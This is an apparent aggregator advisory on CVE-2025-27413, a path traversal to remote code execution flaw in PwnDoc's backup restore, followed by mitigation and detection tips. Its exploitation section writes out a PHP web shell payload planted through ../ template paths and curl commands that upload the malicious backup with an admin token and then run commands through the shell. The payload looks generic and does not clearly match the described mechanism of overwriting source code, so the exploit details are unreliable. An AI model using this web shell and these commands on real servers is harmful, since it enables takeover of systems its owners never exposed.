How the CVE Works
CVE-2025-27413 exploits PwnDoc’s backup restore feature, where administrators can import database backups containing malicious path traversal sequences (../). The vulnerability arises when template updates use unsanitized paths from the database, allowing attackers to write arbitrary files anywhere on the filesystem. Since administrators (with backups:create, backups:update, and `templates:update` permissions) can overwrite application source code, this leads to Remote Code Execution (RCE). The flaw is fixed in PwnDoc v1.2.0 by validating file paths during backup restoration.
DailyCVE Form
Platform: PwnDoc
Version: <1.2.0
Vulnerability: Path Traversal → RCE
Severity: Critical
Date: 04/15/2025
What Undercode Say:
Exploitation:
1. Craft Malicious Backup:
- Inject `../` sequences in template paths.
{"templates": [{"path": "../../../malicious.php", "content": "<?php system($_GET['cmd']); ?>"}]}
2. Upload & Restore Backup:
curl -X POST -F "file=@malicious_backup.zip" -H "Authorization: Bearer ADMIN_TOKEN" http://pwnDoc-host/api/backups/restore
3. Trigger Payload:
curl http://pwnDoc-host/malicious.php?cmd=id
Mitigation:
1. Patch: Upgrade to PwnDoc v1.2.0+.
2. Sanitization: Block `../` in file paths.
def sanitize_path(path):
if "../" in path:
raise ValueError("Path traversal detected")
3. Permissions: Restrict `templates:update` to essential users.
Detection:
- Log Analysis:
grep "backups/restore" /var/log/pwnDoc/access.log | grep "../"
- File Integrity Checks:
find /var/www/pwnDoc -type f -exec sha256sum {} \; > baseline.txt
References:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
